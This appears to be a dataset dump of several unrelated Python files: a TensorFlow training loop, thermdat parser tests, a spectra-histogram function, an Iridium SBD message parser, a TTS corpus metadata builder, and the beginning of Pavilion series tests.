text
stringlengths
957
885k
from pathlib import Path
from skimage import io
import tensorflow as tf
from datetime import datetime
from tqdm import tqdm
from dataset.datasetbase import DatasetBase
from models.base import Model
import numpy as np
import logging


def get_num_of_parameters():
    """Return the total number of scalar values across all trainable variables."""
    total_parameters = 0
    for variable in tf.trainable_variables():
        shape = variable.get_shape()
        variable_parameters = 1
        for dim in shape:
            variable_parameters *= dim.value
        total_parameters += variable_parameters
    return total_parameters


def fit(model: Model, dataset: DatasetBase, save_path: Path,
        save_interval_minute: int = 15, epochs: int = 1):
    """Train `model` on `dataset`, alternating a full train pass and a full
    test pass per epoch.

    Checkpoints and TensorBoard summaries are written under
    ``save_path / str(model)``; a checkpoint is taken at the end of a pass
    whenever at least `save_interval_minute` minutes have elapsed since the
    previous one, and once more when training finishes.
    """
    save_path = save_path.expanduser().absolute()
    model.build_graph()
    train = True
    test = not train
    switch = True          # True -> (re)initialize the iterator for the current phase
    sum_loss = 0
    sum_acc = 0
    saver = tf.train.Saver(save_relative_paths=True)
    epoch = -1             # first switch into the train phase bumps this to 0
    # BUG FIX: the original stored only `datetime.now().minute` and tested
    # `now - datetime.now().minute >= save_interval_minute`.  Because the
    # clock moves forward, that difference is <= 0 except across an hour
    # boundary, so periodic checkpoints almost never fired.  Track a full
    # timestamp and compare real elapsed seconds instead.
    last_save = datetime.now()
    logging.info(f"Number of trainable parameters: {get_num_of_parameters()}")
    with tf.Session() as sess, tqdm() as progress:
        sess.run(tf.global_variables_initializer())
        sum_writer = tf.summary.FileWriter(save_path / str(model) / "logdir",
                                           sess.graph)
        while epoch <= epochs:
            # Switch to test or train dataset
            if switch:
                switch = False
                if train:
                    sess.run(dataset.train_init_op)
                    progress.total = dataset.train_size
                    epoch += 1
                elif test:
                    sess.run(dataset.test_init_op)
                    progress.total = dataset.test_size
            try:
                phase = 'train' if train else 'test'
                loss = 0
                acc = 0
                if phase == 'train':
                    loss, acc, _ = sess.run(
                        [model.loss(), model.accuracy(), model.optimize()],
                        feed_dict={tf.keras.backend.learning_phase(): 1})
                elif phase == 'test':
                    loss, acc = sess.run(
                        [model.loss(), model.accuracy()],
                        feed_dict={tf.keras.backend.learning_phase(): 0})
                sum_loss += loss
                sum_acc += acc
                # Running means over the batches seen so far in this pass.
                batches = (progress.n / dataset.batch_size + 1)
                desc = f"Epoch: {epoch:<5}| Phase: {phase:<10}| " \
                       f"loss: {sum_loss / batches :<25}| " \
                       f"acc: {sum_acc / batches :<25}| "
                progress.set_description(desc=desc)
                progress.update(dataset.batch_size)
            except tf.errors.OutOfRangeError:
                # End of the current dataset pass: flip phase, reset counters.
                progress.write("")
                train = not train
                test = not test
                switch = True
                progress.n = 0
                sum_loss = 0
                sum_acc = 0
                if (datetime.now() - last_save).total_seconds() >= save_interval_minute * 60:
                    last_save = datetime.now()
                    saver.save(sess, str(save_path / str(model) / str(model)))
                    # close/reopen forces the event file onto disk.
                    sum_writer.flush()
                    sum_writer.close()
                    sum_writer.reopen()
                continue
        sum_writer.flush()
        sum_writer.close()
        saver.save(sess, str(save_path / str(model) / str(model)))


def predict(model: Model, dataset: DatasetBase, restore_path: Path):
    """Restore a checkpoint and display per-sample predictions in a loop.

    Runs indefinitely: each pass re-initializes the test iterator, prints the
    argmax class of the prediction and shows the first channel of the first
    sample as a grayscale image.
    """
    restore_path = restore_path.expanduser().absolute()
    model.build_graph()
    saver = tf.train.Saver(save_relative_paths=True)
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        saver.restore(sess, str(restore_path))
        while True:
            sess.run(dataset.test_init_op)
            try:
                pred, x, y = sess.run(
                    [model.predict(), dataset.x, dataset.y],
                    feed_dict={tf.keras.backend.learning_phase(): 0})
                pred = np.argmax(pred)
                print(pred)
                io.imshow(x[0, :, :, 0], cmap="gray")
                io.show()
            except tf.errors.OutOfRangeError:
                continue
# -*- coding: utf-8 -*-
"""
Tests for pmutt.io.thermdat module
Created on Fri Jul 7 12:31:00 2018
"""
import unittest
import pmutt.io.thermdat as thermdat
import numpy as np


class TestThermdat(unittest.TestCase):
    # Unit tests for the private line-parsing helpers of pmutt.io.thermdat.
    # NOTE(review): literal fixture strings below were recovered from a
    # whitespace-collapsed source; the original thermdat lines are
    # fixed-width, so internal spacing may have differed — the helpers under
    # test split on whitespace, so the expectations should be unaffected.

    def test__get_fields(self):
        # Leading/trailing blanks and newlines must not affect the parsed fields.
        lines = [
            ' test 200 ## %^& test100',
            'test 200 ## %^& test100 ',
            'test 200 ## %^& test100 \n',
            '\n test 200 ## %^& test100',
            '\n test 200 ## %^& test100 \n'
        ]
        # Default delimiter and remove fields
        expected_fields = ['test', '200', '##', '%^&', 'test100']
        for line in lines:
            self.assertListEqual(thermdat._get_fields(line), expected_fields)
        # Changed delimiter to '#'
        expected_fields = ['test200', '%^&test100']
        for line in lines:
            self.assertListEqual(
                thermdat._get_fields(line,
                                     delimiter='#',
                                     remove_fields=['', '\n', ' ']),
                expected_fields)
        # Added 'test' to remove_fields
        expected_fields = ['200', '##', '%^&', '100']
        for line in lines:
            self.assertListEqual(
                thermdat._get_fields(line, remove_fields=['', '\n', 'test']),
                expected_fields)

    def test__is_temperature_header(self):
        # Species/coefficient lines must not be mistaken for the global
        # temperature header; genuine three-number headers must be accepted.
        false_lines = [
            'THERMO ALL',
            'H2O H 2O 1 G200.0 1100.0 493.9 1',
            ' 3.65264072E+00 1.06108515E-03 3.83455580E-08 3.84923664E-10-2.13953966E-13 2',
            '-3.02204928E+04 1.60236266E+00 3.99524709E+00 5.18551442E-04-5.53026360E-06 3',
            ' 1.85895538E-08-1.55138452E-11-3.02807840E+04-7.89384507E-02 4',
            '100 200 300 400'
        ]
        for line in false_lines:
            self.assertFalse(thermdat._is_temperature_header(line))
        true_lines = [
            ' 100 500 1500 \n',
            '100 500 1500\n',
            '100 500 1500 \n '
        ]
        for line in true_lines:
            self.assertTrue(thermdat._is_temperature_header(line))

    def test__read_line_num(self):
        # The trailing integer of a thermdat record is its line number (1-4).
        lines = [
            'a b c d 1\n',
            'a 2 \n',
            'a c 3 ',
            ' 4'
        ]
        expected_values = [1, 2, 3, 4]
        for line, expected_value in zip(lines, expected_values):
            self.assertEqual(thermdat._read_line_num(line), expected_value)
        with self.assertRaises(ValueError):
            thermdat._read_line_num('line ending with letter')

    def test__read_line1(self):
        # Line 1 carries name, element counts, phase, temperature limits and
        # (optionally) free-text notes.
        lines = [
            'H2 H 2 G200.0 1100.0 493.9 1',
            'H2O H 2O 1 G200.0 1100.0 493.9 1',
            'CH3OH H 4O 1C 1 G200.0 1100.0 493.9 1',
            'Oxazirene H 1O 1C 1N 1L200.0 1100.0 493.9 1',
            'Pt(B) bulk species Pt 1 S200.0 1100.0 493.9 1'
        ]
        expected_values = [{
            'name': 'H2',
            'elements': {
                'H': 2
            },
            'phase': 'G',
            'T_low': 200.,
            'T_high': 1100.,
            'T_mid': 493.9,
        }, {
            'name': 'H2O',
            'elements': {
                'H': 2,
                'O': 1
            },
            'phase': 'G',
            'T_low': 200.,
            'T_high': 1100.,
            'T_mid': 493.9,
        }, {
            'name': 'CH3OH',
            'elements': {
                'H': 4,
                'O': 1,
                'C': 1
            },
            'phase': 'G',
            'T_low': 200.,
            'T_high': 1100.,
            'T_mid': 493.9,
        }, {
            'name': 'Oxazirene',
            'elements': {
                'H': 1,
                'O': 1,
                'C': 1,
                'N': 1
            },
            'phase': 'L',
            'T_low': 200.,
            'T_high': 1100.,
            'T_mid': 493.9,
        }, {
            'name': 'Pt(B)',
            'elements': {
                'Pt': 1
            },
            'phase': 'S',
            'T_low': 200.,
            'T_high': 1100.,
            'T_mid': 493.9,
            'notes': 'bulk species'
        }]
        for line, expected_value in zip(lines, expected_values):
            self.assertDictEqual(thermdat._read_line1(line), expected_value)

    def test__read_line2(self):
        # Line 2 holds the first five high-T NASA polynomial coefficients.
        lines = [
            ' 3.65264072E+00 1.06108515E-03 3.83455580E-08 3.84923664E-10-2.13953966E-13 2',
            ' 3.652641E+00 1.061085E-03 3.834556E-08 3.849237E-10 -2.139540E-13 2'
        ]
        expected_values = [
            np.array([
                3.65264072E+00, 1.06108515E-03, 3.83455580E-08, 3.84923664E-10,
                -2.13953966E-13, 0., 0.
            ]),
            np.array([
                3.652641E+00, 1.061085E-03, 3.834556E-08, 3.849237E-10,
                -2.139540E-13, 0., 0.
            ])
        ]
        for line, expected_value in zip(lines, expected_values):
            data = thermdat._read_line2(line, nasa_data={})
            np.testing.assert_allclose(data['a_high'], expected_value)

    def test__read_line3(self):
        # Line 3 finishes a_high (last two coefficients) and starts a_low.
        lines = [
            ' 3.65264072E+00 1.06108515E-03 3.83455580E-08 3.84923664E-10-2.13953966E-13 3',
            ' 3.652641E+00 1.061085E-03 3.834556E-08 3.849237E-10 -2.139540E-13 3'
        ]
        expected_a_high_values = [
            np.array([0., 0., 0., 0., 0., 3.65264072E+00, 1.06108515E-03]),
            np.array([0., 0., 0., 0., 0., 3.652641E+00, 1.061085E-03])
        ]
        expected_a_low_values = [
            np.array([
                3.83455580E-08, 3.84923664E-10, -2.13953966E-13, 0., 0., 0., 0.
            ]),
            np.array(
                [3.834556E-08, 3.849237E-10, -2.139540E-13, 0., 0., 0., 0.])
        ]
        for line, expected_a_high_value, expected_a_low_value in zip(
                lines, expected_a_high_values, expected_a_low_values):
            data = thermdat._read_line3(line,
                                        nasa_data={'a_high': np.zeros(7)})
            np.testing.assert_allclose(data['a_high'], expected_a_high_value)
            np.testing.assert_allclose(data['a_low'], expected_a_low_value)

    def test__read_line4(self):
        # Line 4 finishes the low-T coefficient array.
        lines = [
            ' 3.65264072E+00 1.06108515E-03 3.83455580E-08 3.84923664E-10 4',
            ' 3.652641E+00 1.061085E-03 3.834556E-08 3.849237E-10 4'
        ]
        expected_values = [
            np.array([
                0., 0., 0., 3.65264072E+00, 1.06108515E-03, 3.83455580E-08,
                3.84923664E-10
            ]),
            np.array([
                0., 0., 0., 3.652641E+00, 1.061085E-03, 3.834556E-08,
                3.849237E-10
            ])
        ]
        for line, expected_value in zip(lines, expected_values):
            data = thermdat._read_line4(line, nasa_data={'a_low': np.zeros(7)})
            np.testing.assert_allclose(data['a_low'], expected_value)


if __name__ == '__main__':
    unittest.main()
#function [SpecDist] = PlotSpectraDistribution(Spectra, WaveLengths,SampStuff, FigNum);
###
###################################################################
### A FUNCTION THAT CREATES & DISPLAYS SPECTRA AS A 2D HISTOGRAM ###
### SPECTRA ARE ASSUMED REFLECTANCES OR EMISSIVITIES IN [0,1]    ###
### SPECTRA ARE MAPPED TO INTEGERS BETWEEN 0 AND 100 (OR < 100)  ###
###################################################################
###
### INPUTS:
###   I1. Spectra IS A NUMBER SPECTRA x NUMBER BANDS
###       ARRAY OF REFLECTANCES OR EMISSIVITIES
###   I2. WaveLengths IS A VECTOR OF THE SPECTRAL WAVELENGTHS
###   I3. SampStuff IS A VECTOR CONTAINING
###       SampInt:       FRACTIONAL SIZE OF HISTOGRAM BINS
###       IntSampInt:    INT VERSION OF SampInt
###       IntTopReflect: INT VALUE OF MAX REF/EMIS BIN
###   I4. FigNum IS THE INDEX OF THE FIGURE TO USE FOR DISPLAY
###       IF FigNum < 1, DO NOT DISPLAY ANYTHING
###
### OUTPUTS:
###   O1. SpecDist IS THE 2D HISTOGRAM
###
### MATLAB AUTHOR: <NAME>
### PYTHON AUTHOR: <NAME>
### LAST UPDATE: 021519
###################################################################
def PlotSpectraDistribution(Spectra, WaveLengths, SampStuff, FigNum):
    """Build (and optionally display) a 2D histogram of a set of spectra.

    Returns the (IntTopReflect x NumWave) histogram `SpecDist`; when
    FigNum > 0 it is also rendered as a 3D surface plot.
    """
    # Imports are function-local in the original MATLAB port; kept that way.
    import numpy as np
    from scipy import signal
    import cv2
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D
    from matplotlib import cm
    ##
    ### INITIALIZE PARAMETERS ###
    SampInt = SampStuff[0]
    IntSampInt = SampStuff[1]
    IntTopReflect = SampStuff[2]
    SMOOTHSIZE = [3, 3]  # averaging kernel size for the final smoothing pass
    NumWave = np.size(Spectra, 1)
    SpecDist = np.zeros((IntTopReflect, NumWave))
    # NOTE(review): the doubled quote is a MATLAB-ism; in Python this is
    # adjacent-string concatenation, so the message reads "...dont match".
    assert NumWave == np.size(WaveLengths), 'Wavelength sizes don''t match'
    ### MAP SPECTRA TO [0, 100] ###
    # Assumes Spectra values lie in [0, 1] (see banner above) — TODO confirm.
    MappedSpectra = np.minimum(100, (Spectra*99)+1)
    MappedSpectra = np.maximum(1, np.round(MappedSpectra/SampInt)*SampInt)
    ##
    ### MAKE A HISTOGRAM FOR EACH WAVELENGTH ###
    # NOTE(review): np.histogram with these edges yields
    # IntTopReflect/IntSampInt bins, which matches the IntTopReflect rows of
    # SpecDist only when IntSampInt == 1 — verify against callers.
    for k in range(NumWave):
        SpecDist[:, k] = np.histogram(
            MappedSpectra[:, k],
            np.arange(0, IntTopReflect+IntSampInt, IntSampInt))[0]
    ### SMOOTH BY TAKING A LOCAL MAX FOLLOWED BY A LOCAL AVERAGE ###
    SpecDist = cv2.dilate(SpecDist, np.ones((3, 3)), iterations=1)
    SpecDist = signal.convolve2d(
        SpecDist, (1/np.prod(SMOOTHSIZE))*np.ones(SMOOTHSIZE), 'same')
    ##
    ### DISPLAY AS MESH ###
    if(FigNum > 0):
        XAxis = WaveLengths;
        YAxis = np.arange(0, IntTopReflect, IntSampInt).T
        X, Y = np.meshgrid(XAxis, YAxis)
        fig = plt.figure(FigNum)
        ax = fig.gca(projection='3d')
        surf = ax.plot_surface(X, Y, SpecDist, cmap=cm.coolwarm,
                               linewidth=0, antialiased=False)
        fig.colorbar(surf, shrink=0.5, aspect=5)
        plt.title('Spectra Histogram')
        plt.xlabel('Wavelength (nm)')
        plt.ylabel('Reflectance')
        plt.show()
    ### END OF FUNCTION ###
    #######################
import typing
import struct

from .basic import Message

# Header layout shared by IEs and messages: one id byte + big-endian u16 length.
_IE_HEADER_STRUCT = struct.Struct(">BH")
# Message header: protocol-version byte + big-endian u16 payload length.
_MESSAGE_HEADER_STRUCT = struct.Struct(">BH")
# Iridium SBD protocol revision understood by this module.
_PROTOCOL_VERSION = 1


class MessageParser:
    """Parser for incoming Iridium SBD messages.

    Fairly naive: it expects exactly one inbound message type, described by
    the ``Message`` subclass supplied to the constructor.
    """

    IE_HEADER_STRUCT = _IE_HEADER_STRUCT            # IE header layout
    MESSAGE_HEADER_STRUCT = _MESSAGE_HEADER_STRUCT  # message header layout
    PROTOCOL_VERSION = _PROTOCOL_VERSION            # expected protocol version

    def __init__(self, expected_message_class: typing.Type[Message]):
        self.msg_class = expected_message_class
        # Build a lookup of the IEs this message type may contain: IEI -> class.
        self._allowed_elements = {}
        for elem_class in self.msg_class.IE_CLASSES:
            self._allowed_elements[elem_class.IEI] = elem_class

    def parse(self, raw_data: bytes) -> Message:
        """Parse raw SBD bytes into an instance of the expected message class.

        Raises ValueError on a malformed header and KeyError on an IEI the
        expected message class does not declare.
        """
        retval = self.msg_class()
        msg_payload = self._msg_slice(raw_data)
        for iei, ie_payload in self._ie_iter(msg_payload):
            ie_class = self._allowed_elements[iei]
            ie = ie_class()
            ie.unpack(ie_payload)
            retval.insert_ie(ie)
        return retval

    # ==============================
    # Internal parsing helpers
    # ==============================
    def _ie_slice(self, data: bytes):
        """Split the first IE off `data`; return (iei, payload, leftovers)."""
        header_size = self.IE_HEADER_STRUCT.size
        header, headless = data[0:header_size], data[header_size:]
        iei, size = self.IE_HEADER_STRUCT.unpack(header)
        ie_payload, leftovers = headless[:size], headless[size:]
        if len(ie_payload) != size:
            raise ValueError(
                "invalid size for iei %s: %s while %s were expected"
                % (iei, len(ie_payload), size,)
            )
        return iei, ie_payload, leftovers

    def _ie_iter(self, data: bytes):
        """Top-level split of the message payload into information elements.

        Works as a generator yielding (ie-id, ie-payload) tuples.
        """
        while len(data) != 0:
            iei, ie_payload, leftovers = self._ie_slice(data)
            yield iei, ie_payload
            data = leftovers

    def _msg_slice(self, data: bytes):
        """Validate the message header and return the message payload."""
        header_size = self.MESSAGE_HEADER_STRUCT.size
        header, msg_payload = data[0:header_size], data[header_size:]
        protocol_version, size = self.MESSAGE_HEADER_STRUCT.unpack(header)
        if protocol_version != self.PROTOCOL_VERSION:
            # BUG FIX: the original wrote
            #   % (protocol_version. self.PROTOCOL_VERSION,)
            # (a dot instead of a comma), so this branch raised
            # AttributeError instead of the intended ValueError.
            raise ValueError(
                "Invalid protocol version: %s, %s were expected"
                % (protocol_version, self.PROTOCOL_VERSION,)
            )
        if size != len(msg_payload):
            raise ValueError(
                "Invalid message size %d. %d were expected"
                % (len(msg_payload), size,)
            )
        return msg_payload


class MessageSerializer:
    """Serializer for SBD messages sent from our side."""

    IE_HEADER_STRUCT = _IE_HEADER_STRUCT            # IE header layout
    MESSAGE_HEADER_STRUCT = _MESSAGE_HEADER_STRUCT  # message header layout
    PROTOCOL_VERSION = _PROTOCOL_VERSION            # protocol version to emit

    def serialize(self, msg: Message) -> bytes:
        """Serialize `msg` as a message header plus concatenated packed IEs."""
        msg_payload = bytes()
        for iei, ie in msg.ies.items():
            msg_payload += self._ie_join(iei, ie.pack())
        msg_data = self._msg_join(msg_payload)
        return msg_data

    # noinspection PyMethodMayBeStatic
    def _ie_join(self, iei: int, ie_payload: bytes):
        """Build the binary form of one IE from its id and payload."""
        size = len(ie_payload)
        # Consistency fix: use the class attribute like every other method
        # here (it aliases the same module-level Struct).
        data = self.IE_HEADER_STRUCT.pack(iei, size)
        data += ie_payload
        return data

    def _msg_join(self, msg_payload: bytes):
        """Prepend the message header to `msg_payload`."""
        header = self.MESSAGE_HEADER_STRUCT.pack(self.PROTOCOL_VERSION,
                                                 len(msg_payload))
        return header + msg_payload
# Builds combined train/val metadata files ("newtrain.txt"/"newval.txt") for a
# multilingual TTS corpus by merging several source corpora (CSS10, LJSpeech,
# ComVoi, SIWIS, VCTK, THCHS-30, OpenSLR Spanish).  Each metadata row is
# id|speaker|lang|wav_path|||transcript|phonemes.
import os
import sys
import random
import pinyin
import jieba
from xpinyin import Pinyin
import re

sys.path.insert(0, "../")

# (directory, file) pairs for each source corpus.
lj_speech = [
    ("data/css10", "metadata.txt")
]
comvoi = [
    ("data/comvoi_clean", "all.txt")
]
css10 = [
    ("data/css10", "train.txt"),
    ("data/css10", "val.txt"),
]
slr = [
    ("data/css10", "line_index_female_co.tsv"),
    ("data/css10", "line_index_male_co.tsv"),
    ("data/css10", "line_index_female_pe.tsv"),
    ("data/css10", "line_index_male_pe.tsv"),
    ("data/css10", "line_index_female_ve.tsv"),
    ("data/css10", "line_index_male_ve.tsv")
]
zhtranscript = [
    ("data/css10", "zhtranscript.txt")
]
entranscript = [
    ("data/css10", "entranscript.txt")
]
#STCMDS = [
#    ("data/css10", "STCMDStrans.txt")
#]
siwis = [
    ("data/css10", "all_prompts_part1.txt"),
    ("data/css10", "all_prompts_part2.txt")
]

# metadata[0] collects training rows, metadata[1] validation rows.
metadata = [["data/css10", "train.txt", []], ["data/css10", "val.txt", []]]
valid_lang = ["chinese", "english", "spanish", "french", "zh", "fr"]
lang_to_id = {"chinese" : "zh", "english" : "en", "spanish" : "es", "french" : "fr"}
id_to_lang = {"zh" : "chinese", "en" : "english", "es" : "spanish", "fr" : "french"}

# --- CSS10: keep rows in valid languages, remap language names to ids. ---
# NOTE(review): valid_lang also contains the ids "zh"/"fr", which are not keys
# of lang_to_id — a row already carrying an id would raise KeyError here.
# Presumably the source files only use full language names; verify.
for d, fs in css10:
    cntr = 0
    with open(os.path.join(d, fs), 'r', encoding='utf-8') as f:
        for line in f:
            info = line.rstrip().split('|')
            idnum, speaker, language, wavpath, _, _, transcript, _ = info
            if info[2] in valid_lang:
                cntr += 1
                info[2] = lang_to_id[info[2]]
                info[1] = "000-" + info[2]
                if fs == "train.txt":
                    metadata[0][2].append(info)
                else:
                    metadata[1][2].append(info)

# --- LJSpeech: single English speaker; every 192nd row goes to validation. ---
for d, fs in lj_speech:
    with open(os.path.join(d, fs), 'r', encoding='utf-8') as f:
        cntr = 0
        for line in f:
            line = line.rstrip().split('|')
            new_stuff = ["0" + str(70000+cntr), "000-en", "en",
                         "english/wavs/" + line[0] + ".wav", "", "",
                         line[2], ""]
            cntr += 1
            if(cntr % 192 == 0):
                metadata[1][2].append(new_stuff)
            else:
                metadata[0][2].append(new_stuff)

# --- ComVoi: keep rows with a known language id; 1% to validation. ---
for d, fs in comvoi:
    with open(os.path.join(d, fs), 'r', encoding='utf-8') as f:
        cntr = 0
        for line in f:
            line = line.rstrip().split('|')
            if line[2] in id_to_lang:
                cntr += 1
                line[3] = id_to_lang[line[2]] + "/" + line[3]
                new_stuff = [line[0], "0" + line[1] + "-" + line[2], line[2],
                             line[3], "", "", line[4], ""]
                if(cntr % 100 == 0):
                    metadata[1][2].append(new_stuff)
                else:
                    metadata[0][2].append(new_stuff)

# --- SIWIS (French): strip guillemets/dashes from prompts; 1% to validation. ---
part = 0
for d, fs in siwis:
    part += 1
    with open(os.path.join(d, fs), 'r', encoding='utf-8') as f:
        cntr = 0
        for line in f:
            line = line.rstrip().split('\t')
            cntr += 1
            bad = '«»–'
            for char in bad:
                line[1] = line[1].replace(char, "")
            trans = line[1].strip()
            new_stuff = [0, "027-fr", "fr",
                         "french/siwis/wavs/part" + str(part) + "/"
                         + line[0].split('.')[0] + "r.wav",
                         "", "", trans, ""]
            if (cntr % 100 == 0):
                metadata[1][2].append(new_stuff)
            else:
                metadata[0][2].append(new_stuff)

# --- VCTK (English): assign sequential 3-digit speaker ids; 2% to validation. ---
en_speakers = {}
speaker_id = 0
for d, fs in entranscript:
    with open(os.path.join(d,fs), 'r', encoding='utf-8') as f:
        cntr = 0
        for line in f:
            cntr += 1
            line = line.rstrip().split('|')
            speaker = line[0].split('_')[0]
            if speaker not in en_speakers:
                speaker_id += 1
                en_speakers[speaker] = str(speaker_id).zfill(3)
            new_stuff = [0, en_speakers[speaker] + "-en", "en",
                         "english/VCTK-Corpus/wavs/" + speaker
                         + "/" + line[0].split('.')[0] + "r.wav",
                         "", "", line[1], ""]
            if cntr % 50 == 0:
                metadata[1][2].append(new_stuff)
            else:
                metadata[0][2].append(new_stuff)

# --- THCHS-30 (Chinese): transcripts converted to pinyin; speaker ids start
# after the ones reserved above (speaker_id = 7). ---
zh_speakers = {}
speaker_id = 7
py = Pinyin()
for d, fs in zhtranscript:
    with open(os.path.join(d, fs), 'r', encoding='utf-8') as f:
        cntr = 0
        for line in f:
            cntr += 1
            line = line.rstrip().split('|')
            speaker = line[0].split('_')[0][1:]
            if speaker not in zh_speakers:
                speaker_id += 1
                zh_speakers[speaker] = str(speaker_id).zfill(3)
            new_stuff = [0, zh_speakers[speaker] + "-zh", "zh",
                         "chinese/data_thchs30/data" + "/" + line[0] + "r.wav",
                         "", "", pinyin.get(line[1]) + "。", ""]
            if cntr % 30 == 0:
                metadata[1][2].append(new_stuff)
            else:
                metadata[0][2].append(new_stuff)

# zh_speakers = {}
# for d, fs in STCMDS:
#     with open(os.path.join(d, fs), 'r', encoding='utf-8') as f:
#         cntr = 0
#         for line in f:
#             cntr += 1
#             line = line.rstrip().split('|')
#             speaker = line[0][8:14]
#             if speaker not in zh_speakers:
#                 speaker_id += 1
#                 zh_speakers[speaker] = str(speaker_id).zfill(3)
#             seglist = jieba.cut(line[1])
#             trans = ""
#             for seg in seglist:
#                 trans += pinyin.get(seg)
#                 trans += " "
#             new_stuff = [0, zh_speakers[speaker] + "-zh", "zh", "chinese/STCMDS" + "/" + line[0] + "r.wav", "", "", trans[:-1] + "。", ""]
#             if cntr % 100 == 0:
#                 metadata[1][2].append(new_stuff)
#             else:
#                 metadata[0][2].append(new_stuff)

# --- OpenSLR Spanish (slr72/73/75): group lines per speaker, sort, and
# assign sequential speaker ids; ~3% to validation. ---
slr_speakers = {}
speaker_id = 0
country_to_slr = {"co" : "72", "pe" : "73", "ve": "75"}
for d, fs in slr:
    cntr = 0
    sorted_lines = []
    gender = fs.split('_')[2]
    slrver = country_to_slr[fs.split('_')[3].split(".")[0]]
    with open(os.path.join(d, fs), 'r', encoding='utf-8') as f:
        for line in f:
            line = line.rstrip().split('\t')
            file_info = line[0].split('_')
            sorted_lines.append((file_info[0] + "_" + file_info[1],
                                 file_info[2], line[1].rstrip()))
    sorted_lines = sorted(sorted_lines, key=lambda line: line[0])
    for line in sorted_lines:
        if line[0] not in slr_speakers:
            speaker_id += 1
            slr_speakers[line[0]] = str(speaker_id).zfill(3)
        #print(slr_speakers[line[0] + line[1]] + '|' + line[0] + "_" + line[1] + "_" +line[2] + "|" + line[3])
        cntr += 1
        wav_path = "spanish/" + "slr" + slrver + "/wavs" + gender + "/" + line[0] + "_" + line[1] + "r.wav"
        new_stuff = [0, slr_speakers[line[0]] + "-es", "es", wav_path,
                     "", "", line[2], ""]
        if cntr % 30 == 0:
            metadata[1][2].append(new_stuff)
        else:
            metadata[0][2].append(new_stuff)

# --- Final pass: sort by (language, speaker), cap rows per speaker/language,
# and write the merged metadata files. ---
metadata[0][2].sort(key=lambda data: (data[2], data[1]))
metadata[1][2].sort(key=lambda data: (data[2], data[1]))
#random.shuffle(metadata[1][2])
cntr = 0
# Per-language row caps: lang_max for ordinary speakers, good_max for the
# hand-picked "good" speakers below.
lang_max = {'zh' : 100000, 'fr': 200000, 'es': 200000, 'en': 200000}
good_max = {'zh' : 100000, 'fr': 100000, 'es': 200000, 'en': 2500}
for d, fs, m in metadata:
    valid_data = []
    with open(os.path.join(d, "new"+fs), 'w', encoding='utf-8') as f:
        speaker_cnt = {}
        good_speakers = ['000-en', '000-fr', '027-fr', '000-es', '000-zh']
        for i in m:
            idx, s, l, a, _, _, raw_text, ph = i
            if s not in speaker_cnt:
                speaker_cnt[s] = 0
            if s in good_speakers:
                if speaker_cnt[s] < good_max[l]:
                    speaker_cnt[s] += 1
                    print(f'{str(cntr).zfill(6)}|{s}|{l}|{a}|||{raw_text}|{ph}', file=f)
            else:
                if speaker_cnt[s] < lang_max[l]:
                    speaker_cnt[s] += 1
                    print(f'{str(cntr).zfill(6)}|{s}|{l}|{a}|||{raw_text}|{ph}', file=f)
            # if(s[0:2] == '00' and cntr % 7 < 4 and l != 'zh' and l != 'en'):
            #     print(f'{str(cntr).zfill(6)}|{s}|{l}|{a}|||{raw_text}|{ph}', file=f)
            # elif((s[0:2] != '00' and l != 'en') or (l == 'zh' and cntr % 7 < 5)):
            #     print(f'{str(cntr).zfill(6)}|{s}|{l}|{a}|||{raw_text}|{ph}', file=f)
            # elif(l == 'en' and cntr % 7 < 4):
            #     print(f'{str(cntr).zfill(6)}|{s}|{l}|{a}|||{raw_text}|{ph}', file=f)
            cntr += 1
import time
import io
from datetime import datetime

import pavilion.series_util
from pavilion import arguments
from pavilion import commands
from pavilion import plugins
from pavilion import series
from pavilion.unittest import PavTestCase


class SeriesFileTests(PavTestCase):
    """Integration tests for series configuration handling: circular
    references, the `simultaneous` limit, mode/host variable application,
    inter-set dependencies, and only_if/not_if conditionals."""

    def setUp(self):
        # Each test needs the plugin system live.
        plugins.initialize_plugins(self.pav_cfg)

    def tearDown(self):
        plugins._reset_plugins()

    def test_series_circle(self):
        """Test if it can detect circular references and that
        ordered: True works as intended."""
        series_cmd = commands.get_command('series')
        arg_parser = arguments.get_parser()
        series_args = arg_parser.parse_args(['series', 'series_circle1'])
        # 'series_circle1' is a fixture with a circular depends_on chain.
        self.assertRaises(pavilion.series_util.TestSeriesError,
                          lambda: series_cmd.run(self.pav_cfg, series_args))

    def test_series_simultaneous(self):
        """Tests to see if simultaneous: <num> works as intended. """
        series_config = {
            'series': {'only_set': {'modes': [],
                                    'tests': ['echo_test.b'],
                                    'only_if': {},
                                    'depends_on': [],
                                    'not_if': {}}
                       },
            'modes': ['smode2'],
            'simultaneous': '1',
            'restart': False,
            'ordered': False,
            'host': None
        }
        test_series_obj = series.TestSeries(self.pav_cfg,
                                            series_config=series_config)
        test_series_obj.create_set_graph()
        test_series_obj.run_series()
        # make sure test actually ends
        time.sleep(3)
        test_starts = []
        for test_id, test_obj in test_series_obj.tests.items():
            test_starts.append(test_obj.results['started'])
        # With simultaneous=1, tests must have started strictly one after
        # another, so consecutive start times should be well separated.
        timediff1 = test_starts[1] - test_starts[0]
        timediff2 = test_starts[2] - test_starts[1]
        self.assertGreaterEqual(timediff1, 0.5)
        self.assertGreaterEqual(timediff2, 0.5)

    def test_series_modes(self):
        """Test if modes and host are applied correctly."""
        series_config = {
            'series': {'only_set': {'modes': ['smode1'],
                                    'depends_on': [],
                                    'tests': ['echo_test.a'],
                                    'only_if': {},
                                    'not_if': {}}
                       },
            'modes': ['smode2'],
            'simultaneous': None,
            'ordered': False,
            'restart': False,
            'host': 'this'
        }
        outfile = io.StringIO()
        test_series_obj = series.TestSeries(self.pav_cfg,
                                            series_config=series_config,
                                            outfile=outfile,
                                            errfile=outfile)
        test_series_obj.create_set_graph()
        test_series_obj.run_series()
        # make sure test actually ends
        time.sleep(0.5)
        self.assertNotEqual(test_series_obj.tests, {})
        for test_id, test_obj in test_series_obj.tests.items():
            # Variables from smode2 (series), smode1 (set) and the host file
            # must all be visible in the resolved test.
            vars = test_obj.var_man.variable_sets['var']
            a_num_value = vars.get('another_num', None, None)
            self.assertEqual(a_num_value, '13')
            asdf_value = vars.get('asdf', None, None)
            self.assertEqual(asdf_value, 'asdf1')
            hosty_value = vars.get('hosty', None, None)
            self.assertEqual(hosty_value, 'this')

    def test_series_depends(self):
        """Tests if dependencies work as intended."""
        series_config = {
            'series': {'set_d': {'modes': [],
                                 'tests': ['echo_test.d'],
                                 'depends_on': ['set_c'],
                                 'depends_pass': 'True',
